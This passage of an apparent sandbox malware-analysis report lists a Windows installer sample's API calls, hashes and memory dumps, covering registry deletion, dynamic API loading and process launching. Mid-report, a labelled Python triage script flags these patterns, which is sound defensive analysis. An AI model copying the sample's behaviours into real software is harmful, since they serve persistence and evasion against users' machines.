                                                  • "C:\Users\user\Desktop\LkzvfB4VFj.exe", xrefs: 00405CBF
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CC2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: CountFileNameTempTick
                                                  • String ID: "C:\Users\user\Desktop\LkzvfB4VFj.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                  • API String ID: 1716503409-3617905447
                                                  • Opcode ID: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                  • Instruction ID: e7aa094648ebfea3bacdca9f43850832113df4cf88f6c4d01cd72ac7e01032f8
                                                  • Opcode Fuzzy Hash: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                  • Instruction Fuzzy Hash: 0AF08236308308ABEB108F56ED04B9B7BACDF91750F10C03BFA44EB290D6B499548758

                                                  Control-flow Graph (rendered graph not recoverable from the export)
                                                  APIs
                                                  • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D24
                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
                                                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: CloseEnum$DeleteValue
                                                  • String ID:
                                                  • API String ID: 1354259210-0
                                                  • Opcode ID: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                                                  • Instruction ID: 1e980c0bf3dfe1ee8e8c0bbb525d6a304c4f3a3ada6f962fb42c7dde8bd75a6e
                                                  • Opcode Fuzzy Hash: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                                                  • Instruction Fuzzy Hash: C6215771900108BBEF129F90CE89EEE7A7DEF44344F100076FA55B11E0E7B48E54AA68

                                                   Control-flow Graph (image not rendered): function at 6FEB16DB, basic blocks 6FEB16DB-6FEB1836; subcalls 6FEB1A98, 6FEB22AF, 6FEB22F1, 6FEB26B2, 6FEB2A38, 6FEB2CC3, 6FEB24D8, 6FEB1559, 6FEB1266, 6FEB156B, 6FEB249E, 6FEB14E2; APIs GlobalFree, FreeLibrary
                                                  APIs
                                                    • Part of subcall function 6FEB1A98: GlobalFree.KERNEL32(?), ref: 6FEB1D09
                                                    • Part of subcall function 6FEB1A98: GlobalFree.KERNEL32(?), ref: 6FEB1D0E
                                                    • Part of subcall function 6FEB1A98: GlobalFree.KERNEL32(?), ref: 6FEB1D13
                                                  • GlobalFree.KERNEL32(00000000), ref: 6FEB1786
                                                  • FreeLibrary.KERNEL32(?), ref: 6FEB1809
                                                  • GlobalFree.KERNEL32(00000000), ref: 6FEB182E
                                                    • Part of subcall function 6FEB22AF: GlobalAlloc.KERNEL32(00000040,?), ref: 6FEB22E0
                                                    • Part of subcall function 6FEB26B2: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6FEB1757,00000000), ref: 6FEB2782
                                                    • Part of subcall function 6FEB156B: wsprintfA.USER32 ref: 6FEB1599
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92789234716.000000006FEB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FEB0000, based on PE: true
                                                   • Associated: 00000000.00000002.92789161524.000000006FEB0000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000000.00000002.92789295698.000000006FEB3000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000000.00000002.92789366643.000000006FEB5000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6feb0000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$Alloc$Librarywsprintf
                                                  • String ID:
                                                  • API String ID: 3962662361-3916222277
                                                  • Opcode ID: 0e8c0b6f1598787ff33c91ab189a2414992288bd702504909afb2a28a74f785e
                                                  • Instruction ID: 1a24e5f7d9adb198f4e7a0f2daaaad3c409361033a8e77dec485a85eb0470775
                                                  • Opcode Fuzzy Hash: 0e8c0b6f1598787ff33c91ab189a2414992288bd702504909afb2a28a74f785e
                                                  • Instruction Fuzzy Hash: 774180710053159BCB019FF49BC4BD53FADBF07338F24842EE9159A286DB78A445CBA1

                                                   Control-flow Graph (image not rendered): function at 00401C2E, basic blocks 00401C2E-00401CF6 plus shared exit block 00402A5A-00402A69; subcalls 00402BAC, 00402BCE; APIs FindWindowExA, SendMessageTimeoutA, SendMessageA
                                                  APIs
                                                  • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                                  • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CB6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Timeout
                                                  • String ID: !
                                                  • API String ID: 1777923405-2657877971
                                                  • Opcode ID: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
                                                  • Instruction ID: ba3ca6c87ae36af76b9178a01453159e8aa8f3f4b54328e0dc7fa76aa85262fd
                                                  • Opcode Fuzzy Hash: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
                                                  • Instruction Fuzzy Hash: 10216071A44208BEEB05AFB5D98AAAD7FB4EF44304F20447FF502B61D1D6B88541DB28

                                                   Control-flow Graph (image not rendered): function at 00402476, basic blocks 00402476-004025EB plus shared exit block 00402A5A-00402A69; subcalls 00402BCE, 00402C5E, 00402BAC, 004030D8; APIs lstrlenA, RegSetValueExA, RegCloseKey
                                                  APIs
                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsi9279.tmp,00000023,00000011,00000002), ref: 004024C1
                                                  • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsi9279.tmp,00000000,00000011,00000002), ref: 00402501
                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsi9279.tmp,00000000,00000011,00000002), ref: 004025E5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: CloseValuelstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsi9279.tmp
                                                  • API String ID: 2655323295-2586841839
                                                  • Opcode ID: 7a7c23c04c90be8b3e585445916e0e680a3a1629c3414f9b9df94d306a1b16c3
                                                  • Instruction ID: f8068cdfa95035626473adca5f51816a5c1db3e2bbb00f719c7efdf62c59a762
                                                  • Opcode Fuzzy Hash: 7a7c23c04c90be8b3e585445916e0e680a3a1629c3414f9b9df94d306a1b16c3
                                                  • Instruction Fuzzy Hash: 12118171E00218AFEF10AFA59E89EAE7A74EB44314F20443BF505F71D1D6B99D419B28
                                                  APIs
                                                  • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020C8
                                                    • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00424248,758423A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                    • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00424248,758423A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                    • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00424248,758423A0), ref: 0040527A
                                                    • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                    • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                    • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                    • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                  • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020D8
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
                                                  • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 2987980305-0
                                                  • Opcode ID: 2b161932b8e15f20ea054abb7da5fd45cac2ee1996f8da02ed958f71ebdc799e
                                                  • Instruction ID: f7200b9d034bcb950a45a2beb12b39e5fe5f048be62c56950c98b25cd9e943c1
                                                  • Opcode Fuzzy Hash: 2b161932b8e15f20ea054abb7da5fd45cac2ee1996f8da02ed958f71ebdc799e
                                                  • Instruction Fuzzy Hash: 7A21C932600115EBCF207FA58F49A5F76B1AF14359F20423BF651B61D1CABC89829A5E
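The function summaries on this page list, per function, the Win32 APIs Joe Sandbox resolved together with the recovered arguments and the call-site address. Two of them carry most of the triage value: the routine at 004020C8 (GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary) is the pattern a "dynamically determine API calls" signature keys on, and in the installer-launch routine the sixth CreateProcessA argument, 04000000, is dwCreationFlags (CREATE_DEFAULT_ERROR_MODE; not CREATE_SUSPENDED, so this call is not the suspended-process injection step). The Python script below is an added example, not part of the Joe Sandbox report or its tooling: it parses API bullets copied from this page (constructed samples embedded inline), ignores "Part of subcall function" entries when matching API pairs, and decodes the creation flags. The heuristic names and the SAMPLES keys are my own; the flag constants are the documented Win32 values. The comma split on arguments is a known weakness, since a string argument containing a comma would be mis-split.

```python
"""Parse the per-function "APIs" listings of a Joe Sandbox report and run a
few triage heuristics over them. Added example; not Joe Sandbox code."""
import re

# Constructed samples: API bullets copied from the function summaries on this page.
SAMPLES = {
    "00402D70": r"""
• RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
• RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
• RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
• RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
""",
    "004020C8": r"""
• GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020C8
  • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00424248,758423A0), ref: 00405257
• LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020D8
• GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
• FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152
""",
    "004057BF": r"""
• CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C098,Error launching installer), ref: 004057BF
• CloseHandle.KERNEL32(?), ref: 004057CC
""",
    "6FEB16DB": r"""
• GlobalFree.KERNEL32(00000000), ref: 6FEB1786
• FreeLibrary.KERNEL32(?), ref: 6FEB1809
  • Part of subcall function 6FEB22AF: GlobalAlloc.KERNEL32(00000040,?), ref: 6FEB22E0
  • Part of subcall function 6FEB156B: wsprintfA.USER32 ref: 6FEB1599
""",
}

# One bullet: optional subcall prefix, API.MODULE, optional "(args)", ", ref: ADDR".
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Win32 dwCreationFlags bits worth surfacing during triage.
CREATION_FLAGS = {
    0x00000004: "CREATE_SUSPENDED",
    0x00000008: "DETACHED_PROCESS",
    0x00000010: "CREATE_NEW_CONSOLE",
    0x04000000: "CREATE_DEFAULT_ERROR_MODE",
    0x08000000: "CREATE_NO_WINDOW",
}


def parse_listing(text):
    """One dict per API bullet. Arguments are split on commas, which is fine for
    hex values and '?' but would mis-split a string argument containing a comma."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = m.group("args")
        calls.append({
            "api": m.group("api"),
            "module": m.group("mod"),
            "args": args.split(",") if args else [],
            "ref": m.group("ref").upper(),
            "subcall_of": (m.group("sub") or "").upper() or None,
        })
    return calls


def decode_flags(hex_arg, table):
    """Names of the bits of table set in hex_arg; None when the sandbox could not
    recover the value (it prints '?' in that case)."""
    try:
        value = int(hex_arg, 16)
    except ValueError:
        return None
    return [name for bit, name in sorted(table.items()) if value & bit]


def triage(text):
    """Heuristics over one function's listing. Only direct calls feed the API-pair
    rules; subcall entries belong to callees and would inflate the matches."""
    calls = parse_listing(text)
    direct = {c["api"] for c in calls if c["subcall_of"] is None}
    findings = []
    if any(a.startswith("LoadLibrary") for a in direct) and "GetProcAddress" in direct:
        findings.append("dynamic API resolution (LoadLibrary* + GetProcAddress)")
    if {"RegEnumKeyA", "RegDeleteKeyA"} <= direct:
        findings.append("recursive registry key deletion (RegEnumKeyA + RegDeleteKeyA)")
    for c in calls:
        if c["api"].startswith("CreateProcess") and len(c["args"]) >= 6:
            flags = decode_flags(c["args"][5], CREATION_FLAGS)  # dwCreationFlags
            if flags is None:
                findings.append("CreateProcess with unrecovered creation flags")
            else:
                findings.append("CreateProcess flags: " + ("|".join(flags) or "none"))
                if "CREATE_SUSPENDED" in flags:
                    findings.append("suspended child (injection staging candidate)")
    return findings


def triage_all(samples=SAMPLES):
    """Map each function address to its findings."""
    return {func: triage(text) for func, text in samples.items()}


if __name__ == "__main__":
    for func, findings in triage_all().items():
        print(func, findings or ["no heuristic matched"])
```

Feeding the whole report through `triage` one function at a time turns a few thousand lines of listing into a short list of addresses worth opening in the disassembler; the thread-injection behaviour the summary reports will show up as a CreateProcess* call whose flags decode to CREATE_SUSPENDED, which none of the four functions sampled here has.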
                                                  APIs
                                                    • Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,75843410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,75843410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
                                                    • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
                                                    • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F
                                                  • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                    • Part of subcall function 004056E4: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727
                                                  • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\tranchet\Trykmaalere,00000000,00000000,000000F0), ref: 0040163C
                                                  Strings
                                                  • C:\Users\user\tranchet\Trykmaalere, xrefs: 00401631
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                  • String ID: C:\Users\user\tranchet\Trykmaalere
                                                  • API String ID: 1892508949-2736763094
                                                  • Opcode ID: 6f48d1f4569c46ba79332d618e5f2744522d6a7c4d3c9928c8ba38f6ac20f072
                                                  • Instruction ID: 2360f0c6ce39ff042ef5b5b007943225e6ab3dc636003d735fb75761c746189e
                                                  • Opcode Fuzzy Hash: 6f48d1f4569c46ba79332d618e5f2744522d6a7c4d3c9928c8ba38f6ac20f072
                                                  • Instruction Fuzzy Hash: C1110431204141EBCB307FB55D419BF37B09A52725B284A7FE591B22E3DA3D4943AA2E
                                                  APIs
                                                  • RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,Call,0042A070,?,?,?,00000002,Call,?,00406293,80000002), ref: 00406024
                                                  • RegCloseKey.KERNELBASE(?,?,00406293,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,0042A070), ref: 0040602F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: CloseQueryValue
                                                  • String ID: Call
                                                  • API String ID: 3356406503-1824292864
                                                  • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                  • Instruction ID: 43fb42cdfa68b2f9ef01d23c83e90927a4e1ed7766022ad00d18a88e1c3f91d6
                                                  • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                  • Instruction Fuzzy Hash: 9F01BC72100209ABCF22CF20CC09FDB3FA9EF45364F00403AF916A2191D238C968CBA4
                                                  APIs
                                                  • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C098,Error launching installer), ref: 004057BF
                                                  • CloseHandle.KERNEL32(?), ref: 004057CC
                                                  Strings
                                                  • Error launching installer, xrefs: 004057A9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateHandleProcess
                                                  • String ID: Error launching installer
                                                  • API String ID: 3712363035-66219284
                                                  • Opcode ID: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                                                  • Instruction ID: 4c3df7556a0b034395016ee82922b733160aa74f7bc511f6187c6ec266d632ef
                                                  • Opcode Fuzzy Hash: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                                                  • Instruction Fuzzy Hash: 4DE0B6B4600209BFEB109BA4ED89F7F7BBCEB04604F504525BE59F2290E67498199A7C
                                                  APIs
                                                  • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025BA
                                                  • RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 004025CD
                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsi9279.tmp,00000000,00000011,00000002), ref: 004025E5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: Enum$CloseValue
                                                  • String ID:
                                                  • API String ID: 397863658-0
                                                  • Opcode ID: 7b99555fd6f8dae37ea9679ab54f9e8123d87756e6997b06f3b56209368cff92
                                                  • Instruction ID: ee0fd62ac357f9525b55a30647733f0e3798e9bebba0400de635a53faed38b57
                                                  • Opcode Fuzzy Hash: 7b99555fd6f8dae37ea9679ab54f9e8123d87756e6997b06f3b56209368cff92
                                                  • Instruction Fuzzy Hash: 22017C71604204FFE7219F549E99ABF7ABCEF40358F20403EF505A61C0DAB88A459629
                                                  APIs
                                                  • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402546
                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsi9279.tmp,00000000,00000011,00000002), ref: 004025E5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: CloseQueryValue
                                                  • String ID:
                                                  • API String ID: 3356406503-0
                                                  • Opcode ID: 6213eafd8b46f955f614869397e07eb9b1fadeed980eca135cc1a2a492507a25
                                                  • Instruction ID: 101e8c123746c764c526cee79e76b60048690b918ccacca24166b7bb3c1ff757
                                                  • Opcode Fuzzy Hash: 6213eafd8b46f955f614869397e07eb9b1fadeed980eca135cc1a2a492507a25
                                                  • Instruction Fuzzy Hash: EA11C171A00205EFDF25DF64CE985AE7AB4EF00355F20843FE446B72C0D6B88A86DB19
                                                  APIs
